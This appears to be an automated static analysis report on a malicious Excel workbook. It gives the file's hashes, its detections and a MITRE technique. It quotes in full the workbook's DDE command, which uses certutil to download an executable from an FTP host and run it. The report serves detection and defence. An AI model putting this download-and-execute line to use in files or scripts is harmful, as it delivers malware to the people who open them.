Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 35c4733f506a4cae…

MALICIOUS

Office (OOXML)

Size: 335.2 KB
Created: 2020-12-24 11:15:18 UTC
Authoring application: Microsoft Excel 14.0300
First seen: 2020-12-28
MD5: dfa88bf42c2e76db2ded145ddd9b564a
SHA-1: c6bf729f11432ad23409e92879ef91dced7c7a67
SHA-256: 35c4733f506a4caeb53aab8d7056e9b3d8c973a4b4805e857d7f2a7669c4481f
Risk Score: 120

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution

The critical heuristic 'OOXML_SPREADSHEET_DDE_MALICIOUS' indicates a DDE link is present in the Excel file, specifically executing 'cmd /c certutil -urlcache -split -f ftp://qazwsx@240520.ddns.net/dba.exe %APPDATA%\dba.exe & start %APPDATA%\dba.exe'. This command downloads 'dba.exe' from the specified FTP URL and then executes it. The ClamAV detection further confirms the malicious nature of the file.

Heuristics (2)

  • ClamAV: Xml.Exploit.DDE_Abuse-9987933-1 (severity: critical, ID: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xml.Exploit.DDE_Abuse-9987933-1
  • Spreadsheet DDE link launches a dangerous command (severity: critical, ID: OOXML_SPREADSHEET_DDE_MALICIOUS)
    The Excel workbook contains an externalLinks/ddeLink entry whose ddeService/ddeTopic launches a dangerous executable. This is SpreadsheetML DDE command execution, distinct from WordprocessingML DDE field instructions.